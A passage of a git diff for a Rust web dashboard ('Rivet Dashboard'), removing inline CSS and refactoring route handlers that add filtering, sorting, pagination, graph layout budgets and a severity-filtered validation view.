.line-no{background:rgba(255,210,50,.25);color:#9a6700;font-weight:700} -.source-line .line-no a{color:inherit;text-decoration:none} -.source-line .line-no a:hover{color:var(--accent);text-decoration:underline} -/* ── Syntax highlighting tokens ─────────────────────────────── */ -.hl-key{color:#0550ae}.hl-str{color:#0a3069}.hl-num{color:#0550ae} -.hl-bool{color:#cf222e;font-weight:600}.hl-null{color:#cf222e;font-style:italic} -.hl-comment{color:#6e7781;font-style:italic}.hl-tag{color:#6639ba} -.hl-anchor{color:#953800}.hl-type{color:#8250df}.hl-kw{color:#cf222e;font-weight:600} -.hl-fn{color:#8250df}.hl-macro{color:#0550ae;font-weight:600} -.hl-attr{color:#116329}.hl-punct{color:#6e7781} -.hl-sh-cmd{color:#0550ae;font-weight:600}.hl-sh-flag{color:#953800} -.hl-sh-pipe{color:#cf222e;font-weight:700} -.source-ref-link{color:var(--accent);text-decoration:none;font-family:var(--mono);font-size:.85em} -.source-ref-link:hover{text-decoration:underline} -.source-breadcrumb{display:flex;align-items:center;gap:.4rem;font-size:.85rem;color:var(--text-secondary); - margin-bottom:1rem;flex-wrap:wrap} -.source-breadcrumb a{color:var(--accent);font-weight:500} -.source-breadcrumb .sep{opacity:.35;margin:0 .1rem} -.source-meta{display:flex;gap:1.5rem;font-size:.8rem;color:var(--text-secondary);margin-bottom:1rem} -.source-meta .meta-item{display:flex;align-items:center;gap:.35rem} -.source-refs{margin-top:1.25rem} -.source-refs h3{font-size:.95rem;margin-bottom:.5rem} - -/* ── STPA tree ───────────────────────────────────────────────── */ -.stpa-tree{margin-top:1.25rem} -.stpa-level{padding-left:1.5rem;border-left:2px solid var(--border);margin-left:.5rem} -.stpa-node{display:flex;align-items:center;gap:.5rem;padding:.35rem 0;font-size:.9rem} -.stpa-node a{font-family:var(--mono);font-size:.82rem;font-weight:500} -.stpa-link-label{display:inline-block;padding:.1rem .4rem;border-radius:4px;font-size:.68rem; - font-family:var(--mono);background:rgba(58,134,255,.08);color:var(--accent);font-weight:500; - margin-right:.35rem;white-space:nowrap} -details.stpa-details>summary{cursor:pointer;list-style:none;padding:.4rem .5rem;border-radius:var(--radius-sm); - display:flex;align-items:center;gap:.5rem;transition:background var(--transition);font-size:.9rem} -details.stpa-details>summary::-webkit-details-marker{display:none} -details.stpa-details>summary:hover{background:rgba(58,134,255,.04)} -details.stpa-details>summary .stpa-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4;font-size:.7rem} -details.stpa-details[open]>summary .stpa-chevron{transform:rotate(90deg)} -.stpa-uca-table{width:100%;border-collapse:collapse;font-size:.88rem;margin-top:.75rem} -.stpa-uca-table th{font-weight:600;font-size:.72rem;text-transform:uppercase;letter-spacing:.04em; - color:var(--text-secondary);padding:.5rem .75rem;border-bottom:2px solid var(--border)} -.stpa-uca-table td{padding:.55rem .75rem;border-bottom:1px solid var(--border);vertical-align:top} -.stpa-uca-table tbody tr:hover{background:rgba(58,134,255,.04)} -.uca-type-badge{display:inline-flex;padding:.15rem .5rem;border-radius:4px;font-size:.72rem;font-weight:600;white-space:nowrap} -.uca-type-not-providing{background:#fee;color:#c62828} -.uca-type-providing{background:#fff3e0;color:#e65100} -.uca-type-too-early-too-late{background:#e8f4fd;color:#0c5a82} -.uca-type-stopped-too-soon{background:#f3e5f5;color:#6a1b9a} - -/* ── Traceability explorer ──────────────────────────────────────── */ -.trace-matrix{border-collapse:collapse;font-size:.8rem;margin-bottom:1.5rem;width:100%} -.trace-matrix th{font-weight:600;font-size:.7rem;text-transform:uppercase;letter-spacing:.04em; - color:var(--text-secondary);padding:.45rem .6rem;border-bottom:2px solid var(--border);white-space:nowrap} -.trace-matrix td{padding:.35rem .6rem;border-bottom:1px solid var(--border);text-align:center} -.trace-matrix td:first-child{text-align:left;font-family:var(--mono);font-size:.78rem;font-weight:500} -.trace-matrix tbody tr:hover{background:rgba(58,134,255,.04)} -.trace-cell{display:inline-flex;align-items:center;justify-content:center;width:28px;height:22px; - border-radius:4px;font-size:.75rem;font-weight:700;font-variant-numeric:tabular-nums} -.trace-cell-ok{background:rgba(21,113,58,.1);color:#15713a} -.trace-cell-gap{background:rgba(198,40,40,.1);color:#c62828} -.trace-tree{margin-top:1rem} -.trace-node{display:flex;align-items:center;gap:.5rem;padding:.4rem .6rem;border-radius:var(--radius-sm); - transition:background var(--transition);font-size:.88rem} -.trace-node:hover{background:rgba(58,134,255,.04)} -.trace-node a{font-family:var(--mono);font-size:.82rem;font-weight:500} -.trace-edge{display:inline-block;padding:.1rem .4rem;border-radius:4px;font-size:.68rem; - font-family:var(--mono);background:rgba(58,134,255,.08);color:var(--accent);font-weight:500; - margin-right:.35rem;white-space:nowrap} -.trace-level{padding-left:1.5rem;border-left:2px solid var(--border);margin-left:.5rem} -details.trace-details>summary{cursor:pointer;list-style:none;padding:.4rem .5rem;border-radius:var(--radius-sm); - display:flex;align-items:center;gap:.5rem;transition:background var(--transition);font-size:.88rem} -details.trace-details>summary::-webkit-details-marker{display:none} -details.trace-details>summary:hover{background:rgba(58,134,255,.04)} -details.trace-details>summary .trace-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4;font-size:.7rem} -details.trace-details[open]>summary .trace-chevron{transform:rotate(90deg)} -.trace-history{margin:.35rem 0 .5rem 1.5rem;padding:.5rem .75rem;background:rgba(0,0,0,.015); - border-radius:var(--radius-sm);border:1px solid var(--border);font-size:.8rem} -.trace-history-title{font-size:.7rem;font-weight:600;text-transform:uppercase;letter-spacing:.04em; - color:var(--text-secondary);margin-bottom:.35rem} -.trace-history-item{display:flex;align-items:baseline;gap:.5rem;padding:.15rem 0;color:var(--text-secondary)} -.trace-history-item code{font-size:.75rem;color:var(--accent);font-weight:500} -.trace-history-item .hist-date{font-size:.72rem;color:var(--text-secondary);opacity:.7;min-width:70px} -.trace-history-item .hist-msg{font-size:.78rem;color:var(--text);white-space:nowrap;overflow:hidden;text-overflow:ellipsis} -.trace-status{display:inline-flex;padding:.12rem .4rem;border-radius:4px;font-size:.68rem;font-weight:600; - margin-left:.25rem} -.trace-status-approved{background:rgba(21,113,58,.1);color:#15713a} -.trace-status-draft{background:rgba(184,134,11,.1);color:#b8860b} - -/* ── Artifact embedding in docs ────────────────────────────────── */ -.artifact-embed{margin:.75rem 0;padding:.75rem 1rem;background:var(--card-bg);border:1px solid var(--border); - border-radius:var(--radius);border-left:3px solid var(--accent)} -.artifact-embed-header{display:flex;align-items:center;gap:.5rem;margin-bottom:.35rem} -.artifact-embed-header .artifact-ref{font-family:var(--mono);font-size:.85rem;font-weight:600} -.artifact-embed-title{font-weight:600;font-size:.92rem;color:var(--text)} -.artifact-embed-desc{font-size:.82rem;color:var(--text-secondary);margin-top:.25rem;line-height:1.5} - -/* ── Diagram in artifact detail ────────────────────────────────── */ -.artifact-diagram{margin:1rem 0} -.artifact-diagram .mermaid{background:var(--card-bg);padding:1rem;border-radius:var(--radius); - border:1px solid var(--border)} - -/* ── AADL SVG style overrides (match etch) ────────────────────── */ -.aadl-viewport svg text{font-family:system-ui,-apple-system,BlinkMacSystemFont,sans-serif !important; - font-size:12px !important} -.aadl-viewport svg rect,.aadl-viewport svg polygon{rx:6;ry:6} -.aadl-viewport svg .node rect{stroke-width:1.5px;filter:drop-shadow(0 1px 3px rgba(0,0,0,.1))} -.aadl-viewport svg .edge path,.aadl-viewport svg .edge line{stroke:#888 !important;stroke-width:1.2px} -.aadl-viewport svg .edge polygon{fill:#888 !important;stroke:#888 !important} - -/* ── Scrollbar (subtle) ───────────────────────────────────────── */ -::-webkit-scrollbar{width:6px;height:6px} -::-webkit-scrollbar-track{background:transparent} -::-webkit-scrollbar-thumb{background:#c5c5cd;border-radius:3px} -::-webkit-scrollbar-thumb:hover{background:#a0a0aa} - -/* ── Selection ────────────────────────────────────────────────── */ -::selection{background:rgba(58,134,255,.18)} - -/* ── Cmd+K search modal ──────────────────────────────────────── */ -.cmd-k-overlay{position:fixed;inset:0;background:rgba(0,0,0,.55);backdrop-filter:blur(4px); - z-index:10000;display:none;align-items:flex-start;justify-content:center;padding-top:min(20vh,160px)} -.cmd-k-overlay.open{display:flex} -.cmd-k-modal{background:var(--sidebar);border-radius:12px;width:100%;max-width:600px; - box-shadow:0 16px 70px rgba(0,0,0,.35);border:1px solid rgba(255,255,255,.08); - overflow:hidden;display:flex;flex-direction:column;max-height:min(70vh,520px)} -.cmd-k-input{width:100%;padding:.875rem 1rem .875rem 2.75rem;font-size:1rem;font-family:var(--font); - background:transparent;border:none;border-bottom:1px solid rgba(255,255,255,.08); - color:#fff;outline:none;caret-color:var(--accent)} -.cmd-k-input::placeholder{color:rgba(255,255,255,.35)} -.cmd-k-icon{position:absolute;left:1rem;top:.95rem;color:rgba(255,255,255,.35);pointer-events:none; - font-size:.95rem} -.cmd-k-head{position:relative} -.cmd-k-results{overflow-y:auto;padding:.5rem 0;flex:1} -.cmd-k-empty{padding:1.5rem 1rem;text-align:center;color:rgba(255,255,255,.35);font-size:.9rem} -.cmd-k-group{padding:0 .5rem} -.cmd-k-group-label{font-size:.7rem;font-weight:600;text-transform:uppercase;letter-spacing:.06em; - color:rgba(255,255,255,.3);padding:.5rem .625rem .25rem} -.cmd-k-item{display:flex;align-items:center;gap:.75rem;padding:.5rem .625rem;border-radius:var(--radius-sm); - cursor:pointer;color:var(--sidebar-text);font-size:.88rem;transition:background 80ms ease} -.cmd-k-item:hover,.cmd-k-item.active{background:rgba(255,255,255,.08);color:#fff} -.cmd-k-item-icon{width:1.5rem;height:1.5rem;border-radius:4px;display:flex;align-items:center; - justify-content:center;font-size:.7rem;flex-shrink:0;background:rgba(255,255,255,.06);color:rgba(255,255,255,.5)} -.cmd-k-item-body{flex:1;min-width:0} -.cmd-k-item-title{font-weight:500;white-space:nowrap;overflow:hidden;text-overflow:ellipsis} -.cmd-k-item-title mark{background:transparent;color:var(--accent);font-weight:700} -.cmd-k-item-meta{font-size:.75rem;color:rgba(255,255,255,.35);white-space:nowrap;overflow:hidden;text-overflow:ellipsis} -.cmd-k-item-meta mark{background:transparent;color:var(--accent);font-weight:600} -.cmd-k-item-field{font-size:.65rem;padding:.1rem .35rem;border-radius:3px; - background:rgba(255,255,255,.06);color:rgba(255,255,255,.4);white-space:nowrap;flex-shrink:0} -.cmd-k-kbd{display:inline-flex;align-items:center;gap:.2rem;font-size:.7rem;font-family:var(--mono); - padding:.15rem .4rem;border-radius:4px;background:rgba(255,255,255,.08);color:rgba(255,255,255,.4); - border:1px solid rgba(255,255,255,.06)} -.nav-search-hint{display:flex;align-items:center;justify-content:space-between;padding:.5rem .75rem; - margin-top:auto;border-top:1px solid rgba(255,255,255,.06);padding-top:1rem; - color:var(--sidebar-text);font-size:.82rem;cursor:pointer;border-radius:var(--radius-sm); - transition:all var(--transition)} -.nav-search-hint:hover{background:var(--sidebar-hover);color:var(--sidebar-active)} -.aadl-diagram{background:var(--card-bg);border:1px solid var(--border);border-radius:8px; - margin:1.5rem 0;overflow:hidden;position:relative} -.aadl-diagram .aadl-caption{display:flex;align-items:center;justify-content:space-between; - padding:.5rem 1rem;border-bottom:1px solid var(--border);background:var(--nav-bg); - font-size:.82rem;color:var(--text-secondary)} -.aadl-caption .aadl-title{font-weight:600;color:var(--text);font-family:var(--mono);font-size:.85rem} -.aadl-caption .aadl-badge{display:inline-block;padding:.1rem .5rem;border-radius:var(--radius-sm); - background:var(--primary);color:#fff;font-size:.72rem;font-weight:600;letter-spacing:.02em} -.aadl-controls{display:flex;gap:.25rem} -.aadl-controls button{background:var(--card-bg);border:1px solid var(--border);border-radius:var(--radius-sm); - width:1.7rem;height:1.7rem;cursor:pointer;font-size:.85rem;line-height:1;display:flex; - align-items:center;justify-content:center;color:var(--text-secondary);transition:all .15s} -.aadl-controls button:hover{background:var(--primary);color:#fff;border-color:var(--primary)} -.aadl-viewport{overflow:hidden;cursor:grab;min-height:300px;position:relative;background:var(--body-bg)} -.aadl-viewport.grabbing{cursor:grabbing} -.aadl-viewport svg{transform-origin:0 0;position:absolute;top:0;left:0} -.aadl-viewport svg .node rect,.aadl-viewport svg .node polygon,.aadl-viewport svg .node path,.aadl-viewport svg .node ellipse{filter:drop-shadow(0 1px 2px rgba(0,0,0,.08))} -.aadl-viewport svg .node text{font-family:system-ui,-apple-system,sans-serif} -.aadl-viewport svg .edge path{stroke-dasharray:none} -.aadl-loading{color:var(--text-secondary);font-style:italic;padding:2rem;text-align:center} -.aadl-error{color:var(--danger);font-style:italic;padding:1rem} -.aadl-analysis{border-top:1px solid var(--border);max-height:220px;overflow-y:auto;font-size:.78rem} -.aadl-analysis-header{display:flex;align-items:center;gap:.5rem;padding:.4rem 1rem; - background:var(--nav-bg);font-weight:600;font-size:.75rem;color:var(--text-secondary); - position:sticky;top:0;z-index:1;border-bottom:1px solid var(--border)} -.aadl-analysis-header .badge-count{display:inline-flex;align-items:center;justify-content:center; - min-width:1.3rem;height:1.3rem;border-radius:99px;font-size:.65rem;font-weight:700;padding:0 .3rem} -.badge-error{background:var(--danger);color:#fff} -.badge-warning{background:#e8a735;color:#fff} -.badge-info{background:var(--primary);color:#fff} -.aadl-diag{display:flex;align-items:baseline;gap:.5rem;padding:.3rem 1rem;border-bottom:1px solid var(--border)} -.aadl-diag:last-child{border-bottom:none} -.aadl-diag:hover{background:rgba(0,0,0,.03)} -.aadl-diag .sev{flex-shrink:0;font-size:.65rem;font-weight:700;text-transform:uppercase; - padding:.1rem .35rem;border-radius:var(--radius-sm);letter-spacing:.03em} -.sev-error{background:#fde8e8;color:var(--danger)} -.sev-warning{background:#fef3cd;color:#856404} -.sev-info{background:#d1ecf1;color:#0c5460} -.aadl-diag .diag-path{color:var(--text-secondary);font-family:var(--mono);font-size:.72rem;flex-shrink:0} -.aadl-diag .diag-msg{color:var(--text);flex:1} -.aadl-diag .diag-analysis{color:var(--text-secondary);font-size:.68rem;opacity:.7;flex-shrink:0} -"#; - -// ── Pan/zoom JS ────────────────────────────────────────────────────────── - -const GRAPH_JS: &str = r#" - -"#; - -// ── Cmd+K search JS ────────────────────────────────────────────────────── - -const SEARCH_JS: &str = r#" - -"#; - -// ── AADL diagram JS ───────────────────────────────────────────────────── - -const AADL_JS: &str = r#" - -"#; - -// ── Layout ─────────────────────────────────────────────────────────────── - -fn page_layout(content: &str, state: &AppState) -> Html { - let artifact_count = state.store.len(); - let diagnostics = validate::validate(&state.store, &state.schema, &state.graph); - let error_count = diagnostics - .iter() - .filter(|d| d.severity == Severity::Error) - .count(); - let error_badge = if error_count > 0 { - format!("{error_count}") - } else { - "OK".to_string() - }; - let doc_badge = if !state.doc_store.is_empty() { - format!("{}", state.doc_store.len()) - } else { - String::new() - }; - let result_badge = if !state.result_store.is_empty() { - format!( - "{}", - state.result_store.len() - ) - } else { - String::new() - }; - let stpa_types = [ - "loss", - "hazard", - "sub-hazard", - "system-constraint", - "controller", - "controlled-process", - "control-action", - "uca", - "controller-constraint", - "loss-scenario", - ]; - let stpa_count: usize = stpa_types - .iter() - .map(|t| state.store.count_by_type(t)) - .sum(); - let stpa_nav = if stpa_count > 0 { - format!( - "
  • STPA{stpa_count}
  • " - ) - } else { - String::new() - }; - let version = env!("CARGO_PKG_VERSION"); - - // Context bar - let ctx = &state.context; - let git_html = if let Some(ref git) = ctx.git { - let status = if git.is_dirty { - format!( - "{} uncommitted", - git.dirty_count - ) - } else { - "clean".to_string() - }; - format!( - "/\ - {branch}@{commit}\ - {status}", - branch = html_escape(&git.branch), - commit = html_escape(&git.commit_short), - ) - } else { - String::new() - }; - // Project switcher: show siblings as a dropdown if available - let switcher_html = if ctx.siblings.is_empty() { - String::new() - } else { - let mut s = String::from( - "\ -
    \ - \ -
    ", - ); - for sib in &ctx.siblings { - s.push_str(&format!( - "
    \ - {}\ - rivet -p {} serve -P {}\ -
    ", - html_escape(&sib.name), - html_escape(&sib.rel_path), - ctx.port, - )); - } - s.push_str("
    "); - s - }; - let context_bar = format!( - "
    \ - {project}{switcher_html}\ - /\ - {path}\ - {git_html}\ - Loaded {loaded_at}\ - \ -
    ", - project = html_escape(&ctx.project_name), - path = html_escape(&ctx.project_path), - loaded_at = html_escape(&ctx.loaded_at), - ); - Html(format!( - r##" - - - - -Rivet Dashboard - - - - - - - - -
    -
    - -
    -{context_bar} -
    -{content} - -
    -
    -
    -
    -
    -
    - 🔍 - -
    -
    -
    Type to search artifacts and documents
    -
    -
    -
    -{GRAPH_JS} -{SEARCH_JS} -{AADL_JS} - -"## - )) -} - -// ── Routes ─────────────────────────────────────────────────────────────── - -async fn index(State(state): State) -> Html { +use super::layout::page_layout; +use super::{ + AppState, SharedState, badge_for_type, html_escape, linkify_source_refs, rewrite_image_paths, + type_color_map, +}; +pub(crate) async fn index(State(state): State) -> Html { let state = state.read().await; let inner = stats_partial(&state); page_layout(&inner, &state) } -async fn stats_view(State(state): State) -> Html { +pub(crate) async fn stats_view(State(state): State) -> Html { let state = state.read().await; Html(stats_partial(&state)) } @@ -2755,70 +289,153 @@ fn stats_partial(state: &AppState) -> String { // ── Artifacts ──────────────────────────────────────────────────────────── -async fn artifacts_list(State(state): State) -> Html { +pub(crate) async fn artifacts_list( + State(state): State, + Query(params): Query, +) -> Html { let state = state.read().await; let store = &state.store; - let mut artifacts: Vec<_> = store.iter().collect(); - artifacts.sort_by(|a, b| a.id.cmp(&b.id)); + // Collect all unique types and statuses for filter bar controls + let mut available_types: Vec = store.types().map(|t| t.to_string()).collect(); + available_types.sort(); - let mut html = String::from("

    Artifacts

    "); - // Client-side filter input - html.push_str("
    \ - \ - \ -
    "); - html.push_str( - "
    ", - ); + let mut available_statuses: Vec = { + let mut seen = std::collections::BTreeSet::new(); + for a in store.iter() { + if let Some(s) = &a.status { + seen.insert(s.clone()); + } + } + seen.into_iter().collect() + }; + available_statuses.sort(); - for a in &artifacts { - let status = a.status.as_deref().unwrap_or("-"); - let status_badge = match status { - "approved" => format!("{status}"), - "draft" => format!("{status}"), - "obsolete" => format!("{status}"), - _ => format!("{status}"), + // Collect and apply filters + let active_types = params.type_list(); + let active_status = params.status.as_deref().unwrap_or(""); + let search_q = params.q.as_deref().unwrap_or("").to_lowercase(); + + let mut artifacts: Vec<_> = store + .iter() + .filter(|a| { + // Type filter + if !active_types.is_empty() && !active_types.contains(&a.artifact_type) { + return false; + } + // Status filter + if !active_status.is_empty() { + let art_status = a.status.as_deref().unwrap_or(""); + if art_status != active_status { + return false; + } + } + // Text search on ID and title + if !search_q.is_empty() { + let id_lower = a.id.to_lowercase(); + let title_lower = a.title.to_lowercase(); + if !id_lower.contains(&search_q) && !title_lower.contains(&search_q) { + return false; + } + } + true + }) + .collect(); + + // Apply sorting + let sort_col = params.sort.as_deref().unwrap_or("id"); + let ascending = params.sort_ascending(); + artifacts.sort_by(|a, b| { + let ord = match sort_col { + "type" => a.artifact_type.cmp(&b.artifact_type), + "title" => a.title.cmp(&b.title), + "status" => { + let sa = a.status.as_deref().unwrap_or(""); + let sb = b.status.as_deref().unwrap_or(""); + sa.cmp(sb) + } + "links" => a.links.len().cmp(&b.links.len()), + _ => a.id.cmp(&b.id), }; - html.push_str(&format!( - "\ - \ - \ - \ - ", - html_escape(&a.id), - html_escape(&a.id), - badge_for_type(&a.artifact_type), - html_escape(&a.title), - status_badge, - a.links.len() - )); - } + if ascending { ord } else { ord.reverse() } + }); - html.push_str("
    IDTypeTitleStatusLinks
    {}{}{}{}{}
    "); - html.push_str(&format!( - "

    {} artifacts total

    ", - artifacts.len() - )); - // Inline filter script - html.push_str( - "", - ); + // Pagination + let (page_items, total_filtered) = paginate(&artifacts, ¶ms); + + // Build table rows + let rows: Vec> = page_items + .iter() + .map(|a| { + let status = a.status.as_deref().unwrap_or("-"); + let status_badge = match status { + "approved" => format!("{status}"), + "draft" => format!("{status}"), + "obsolete" => format!("{status}"), + _ => format!("{status}"), + }; + vec![ + format!( + "{}", + html_escape(&a.id), + html_escape(&a.id) + ), + badge_for_type(&a.artifact_type), + html_escape(&a.title), + status_badge, + a.links.len().to_string(), + ] + }) + .collect(); + + let columns = vec![ + Column { + key: "id".into(), + label: "ID".into(), + sortable: true, + }, + Column { + key: "type".into(), + label: "Type".into(), + sortable: true, + }, + Column { + key: "title".into(), + label: "Title".into(), + sortable: true, + }, + Column { + key: "status".into(), + label: "Status".into(), + sortable: true, + }, + Column { + key: "links".into(), + label: "Links".into(), + sortable: true, + }, + ]; + + let mut html = String::from("

    Artifacts

    "); + html.push_str(&filter_bar(&FilterBarConfig { + base_url: "/artifacts", + available_types: &available_types, + available_statuses: &available_statuses, + params: ¶ms, + })); + html.push_str(&sortable_table(&TableConfig { + base_url: "/artifacts", + columns: &columns, + rows: &rows, + params: ¶ms, + })); + html.push_str(&pagination(total_filtered, ¶ms, "/artifacts")); Html(html) } /// Compact preview tooltip for an artifact — loaded on hover. -async fn artifact_preview( +pub(crate) async fn artifact_preview( State(state): State, Path(id): Path, ) -> Html { @@ -2885,7 +502,10 @@ async fn artifact_preview( Html(html) } -async fn artifact_detail(State(state): State, Path(id): Path) -> Html { +pub(crate) async fn artifact_detail( + State(state): State, + Path(id): Path, +) -> Html { let state = state.read().await; let store = &state.store; let graph = &state.graph; @@ -3041,12 +661,14 @@ async fn artifact_detail(State(state): State, Path(id): Path, link_types: Option, #[serde(default = "default_depth")] depth: usize, focus: Option, + /// Maximum number of nodes before the layout bails out. Default 300, max 1000. + budget: Option, } fn default_depth() -> usize { @@ -3054,7 +676,7 @@ fn default_depth() -> usize { } /// Build a filtered subgraph based on query params and return SVG. -async fn graph_view( +pub(crate) async fn graph_view( State(state): State, Query(params): Query, ) -> Html { @@ -3107,17 +729,21 @@ async fn graph_view( ..SvgOptions::default() }; + let budget = params.budget.unwrap_or(300).min(1000); let layout_opts = LayoutOptions { node_width: 200.0, node_height: 56.0, rank_separation: 90.0, node_separation: 30.0, + max_nodes: Some(budget), ..Default::default() }; - let gl = pgv_layout::layout( - &sub, - &|_idx, n| { + // Pre-collect owned node/edge info while holding the read lock. + let node_infos: std::collections::HashMap = sub + .node_indices() + .map(|idx| { + let n = &sub[idx]; let atype = store .get(n.as_str()) .map(|a| a.artifact_type.clone()) @@ -3133,29 +759,55 @@ async fn graph_view( } else { Some(title) }; - NodeInfo { - id: n.clone(), - label: n.clone(), - node_type: atype, - sublabel, - } - }, - &|_idx, e| EdgeInfo { label: e.clone() }, - &layout_opts, - ); - - let svg = render_svg(&gl, &svg_opts); - - // Collect which types are actually present for the legend - let present_types: std::collections::BTreeSet = sub - .node_indices() - .filter_map(|idx| { - store - .get(sub[idx].as_str()) - .map(|a| a.artifact_type.clone()) + ( + idx, + NodeInfo { + id: n.clone(), + label: n.clone(), + node_type: atype, + sublabel, + parent: None, + ports: vec![], + }, + ) }) .collect(); + // Collect present types for the legend before sub is moved. + let present_types: std::collections::BTreeSet = node_infos + .values() + .map(|info| info.node_type.clone()) + .filter(|t| !t.is_empty()) + .collect(); + + // Run layout + SVG render in spawn_blocking to avoid blocking the async runtime. + // Returns (svg_string, node_count, edge_count). + let (svg, node_count, edge_count) = tokio::task::spawn_blocking(move || { + let gl = pgv_layout::layout( + &sub, + &|idx, _n| { + node_infos.get(&idx).cloned().unwrap_or_else(|| NodeInfo { + id: String::new(), + label: String::new(), + node_type: String::new(), + sublabel: None, + parent: None, + ports: vec![], + }) + }, + &|_idx, e| EdgeInfo { + label: e.clone(), + source_port: None, + target_port: None, + }, + &layout_opts, + ); + let svg = render_svg(&gl, &svg_opts); + (svg, gl.nodes.len(), gl.edges.len()) + }) + .await + .unwrap(); + // Build filter controls let mut html = String::from("

    Traceability Graph

    "); @@ -3236,9 +888,14 @@ async fn graph_view( } html.push_str(""); - // SVG card with zoom controls + // SVG card with zoom controls + viewer toolbar html.push_str( - "
    \ + "
    \ +
    \ + \ + \ + \ +
    \
    \
    \ \ @@ -3251,8 +908,8 @@ async fn graph_view( html.push_str(&format!( "

    {} nodes, {} edges — scroll to zoom, drag to pan, click nodes to navigate

    ", - gl.nodes.len(), - gl.edges.len() + node_count, + edge_count )); Html(html) @@ -3261,7 +918,7 @@ async fn graph_view( // ── Ego graph for a single artifact ────────────────────────────────────── #[derive(Debug, serde::Deserialize)] -struct EgoParams { +pub(crate) struct EgoParams { #[serde(default = "default_ego_hops")] hops: usize, } @@ -3270,7 +927,7 @@ fn default_ego_hops() -> usize { 2 } -async fn artifact_graph( +pub(crate) async fn artifact_graph( State(state): State, Path(id): Path, Query(params): Query, @@ -3334,9 +991,15 @@ async fn artifact_graph( label: n.clone(), node_type: atype, sublabel, + parent: None, + ports: vec![], } }, - &|_idx, e| EdgeInfo { label: e.clone() }, + &|_idx, e| EdgeInfo { + label: e.clone(), + source_port: None, + target_port: None, + }, &layout_opts, ); @@ -3381,9 +1044,14 @@ async fn artifact_graph( } html.push_str("
    "); - // SVG with zoom controls + // SVG with zoom controls + viewer toolbar html.push_str( - "
    \ + "
    \ +
    \ + \ + \ + \ +
    \
    \
    \ \ @@ -3502,92 +1170,338 @@ fn apply_filters_to_graph( // ── Validation ─────────────────────────────────────────────────────────── -async fn validate_view(State(state): State) -> Html { +pub(crate) async fn validate_view( + State(state): State, + Query(params): Query, +) -> Html { let state = state.read().await; - let diagnostics = validate::validate(&state.store, &state.schema, &state.graph); + let all_diagnostics = validate::validate(&state.store, &state.schema, &state.graph); - let errors = diagnostics + // Summary counts are always over ALL diagnostics (unfiltered). + let errors_total = all_diagnostics .iter() .filter(|d| d.severity == Severity::Error) .count(); - let warnings = diagnostics + let warnings_total = all_diagnostics .iter() .filter(|d| d.severity == Severity::Warning) .count(); - let infos = diagnostics + let infos_total = all_diagnostics .iter() .filter(|d| d.severity == Severity::Info) .count(); let mut html = String::from("

    Validation Results

    "); - // Colored summary bar - let total_issues = errors + warnings + infos; + // Colored summary bar (unfiltered totals). + let total_issues = errors_total + warnings_total + infos_total; if total_issues == 0 { html.push_str("
    All checks passed
    "); } else { html.push_str(&format!( - "
    {total_issues} issue{} found — {errors} error{}, {warnings} warning{}, {infos} info
    ", + "
    {total_issues} issue{} found — \ + {errors_total} error{}, {warnings_total} warning{}, {infos_total} info
    ", if total_issues != 1 { "s" } else { "" }, - if errors != 1 { "s" } else { "" }, - if warnings != 1 { "s" } else { "" }, + if errors_total != 1 { "s" } else { "" }, + if warnings_total != 1 { "s" } else { "" }, + )); + } + + // ── Severity filter bar ──────────────────────────────────────────── + // We repurpose the `status` param for severity selection and `types` + // param for artifact-type filtering. `q` is free-text search. + let active_severity = params.status.as_deref().unwrap_or(""); + let active_types = params.type_list(); + let search_q = params.q.as_deref().unwrap_or("").to_lowercase(); + + // Collect all artifact types that appear in diagnostics for type filter. + let mut diag_types: Vec = { + let mut seen = std::collections::BTreeSet::new(); + for d in &all_diagnostics { + if let Some(id) = &d.artifact_id + && let Some(a) = state.store.get(id) + { + seen.insert(a.artifact_type.clone()); + } + } + seen.into_iter().collect() + }; + diag_types.sort(); + + // Severity quick-filter buttons. + html.push_str( + "
    ", + ); + html.push_str("
    "); + html.push_str("Severity:"); + for (val, label, badge_cls) in [ + ("", "All", ""), + ("error", "Errors", "badge-error"), + ("warning", "Warnings", "badge-warn"), + ("info", "Info", "badge-info"), + ] { + let is_active = active_severity == val; + let qs = params.to_query_string(&[("status", val), ("page", "1")]); + let border = if is_active { + "border:2px solid var(--accent)" + } else { + "border:1px solid var(--border)" + }; + let badge_part = if badge_cls.is_empty() { + String::new() + } else { + format!( + " {}", + badge_cls, label + ) + }; + html.push_str(&format!( + "{label}{badge_part}", + qs = qs, + label = label, + border = border, + badge_part = badge_part, )); } - if diagnostics.is_empty() { - html.push_str("

    No issues found.

    "); - return Html(html); + // Type filter checkboxes (only if we have type info). + if !diag_types.is_empty() { + html.push_str( + "Type:", + ); + for t in &diag_types { + let checked = if active_types.contains(t) { + " checked" + } else { + "" + }; + html.push_str(&format!( + "", + t_esc = html_escape(t), + checked = checked, + )); + } + } + + // Search box. + let q_val = params.q.as_deref().unwrap_or(""); + html.push_str(&format!( + "
    \ + Search:\ + \ +
    ", + html_escape(q_val), + )); + + // Clear link. + html.push_str( + "Clear", + ); + html.push_str("
    "); // inner flex + filter-bar + + // JS: wire up type checkboxes + search box. + html.push_str( + r#""#, + ); + + if all_diagnostics.is_empty() { + html.push_str("

    No issues found.

    "); + return Html(html); + } + + // ── Apply filters ────────────────────────────────────────────────── + // Sort: errors first, then warnings, then info (stable baseline). + let mut sorted = all_diagnostics; + sorted.sort_by_key(|d| match d.severity { + Severity::Error => 0, + Severity::Warning => 1, + Severity::Info => 2, + }); + + // Apply user sort override on top. + match params.sort.as_deref() { + Some("id") => { + let asc = params.sort_ascending(); + sorted.sort_by(|a, b| { + let ai = a.artifact_id.as_deref().unwrap_or(""); + let bi = b.artifact_id.as_deref().unwrap_or(""); + if asc { ai.cmp(bi) } else { bi.cmp(ai) } + }); + } + Some("severity") => { + let asc = params.sort_ascending(); + sorted.sort_by_key(|d| { + let k = match d.severity { + Severity::Error => 0usize, + Severity::Warning => 1, + Severity::Info => 2, + }; + if asc { k } else { 2 - k } + }); + } + Some("message") => { + let asc = params.sort_ascending(); + sorted.sort_by(|a, b| { + if asc { + a.message.cmp(&b.message) + } else { + b.message.cmp(&a.message) + } + }); + } + _ => {} + } + + // Filter by severity (status param). + if !active_severity.is_empty() { + sorted.retain(|d| { + let sev = match d.severity { + Severity::Error => "error", + Severity::Warning => "warning", + Severity::Info => "info", + }; + sev == active_severity + }); + } + + // Filter by artifact type (types param). + if !active_types.is_empty() { + sorted.retain(|d| { + if let Some(id) = &d.artifact_id + && let Some(a) = state.store.get(id) + { + return active_types.contains(&a.artifact_type); + } + false + }); + } + + // Filter by text query (q param). + if !search_q.is_empty() { + sorted.retain(|d| { + 